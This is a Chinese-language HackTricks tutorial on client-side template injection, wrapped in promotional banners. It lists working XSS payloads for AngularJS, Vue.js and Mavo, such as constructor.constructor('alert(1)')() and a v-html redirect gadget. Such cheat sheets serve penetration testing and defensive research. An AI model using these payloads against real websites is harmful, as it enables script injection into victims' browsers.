6.4 KiB
从零开始学习AWS黑客技术,成为 htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或 关注我的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
摘要
这类似于服务器端模板注入,但是在客户端。SSTI可以让您在远程服务器上执行代码,而CSTI可以让您在受害者中执行任意JavaScript代码。
测试此漏洞的方法与SSTI的情况非常相似,解释器将期望执行双大括号之间的内容并执行它。例如,使用类似于:{{ 7-7 }}
,如果服务器存在漏洞,您将看到0
,如果没有,您将看到原始内容:{{ 7-7 }}
AngularJS
AngularJS是一个广泛使用的JavaScript框架,通过称为指令的属性与HTML进行交互,其中一个著名的指令是**ng-app
**。此指令允许AngularJS处理HTML内容,从而执行双大括号内的JavaScript表达式。
在用户输入动态插入到标记为ng-app
的HTML主体的情况下,可以执行任意JavaScript代码。这可以通过利用输入中的AngularJS语法来实现。以下是演示如何执行JavaScript代码的示例:
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>
<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
您可以在http://jsfiddle.net/2zs2yv7o/和Burp Suite Academy找到AngularJS中漏洞的非常基本的在线示例。
{% hint style="danger" %}
Angular 1.6移除了沙盒,因此从这个版本开始,像{{constructor.constructor('alert(1)')()}}
或<input ng-focus=$event.view.alert('XSS')>
这样的有效载荷应该可以工作。
{% endhint %}
VueJS
您可以在https://vue-client-side-template-injection-example.azu.now.sh/找到一个易受攻击的vue.js实现。
有效载荷:https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%
并且这里是易受攻击示例的源代码:https://github.com/azu/vue-client-side-template-injection-example
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
一个关于VUE中CSTI的非常好的帖子可以在https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets找到
V3
{{_openBlock.constructor('alert(1)')()}}
Credit: Gareth Heyes, Lewis Ardern & PwnFunction
V2
{{constructor.constructor('alert(1)')()}}
Credit: Mario Heiderich
在 https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected 中查看更多VUE有效载荷
Mavo
有效载荷:
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
更多有效载荷请查看 https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations
暴力检测列表
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或 关注我的Twitter 🐦 @carlospolopm.
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。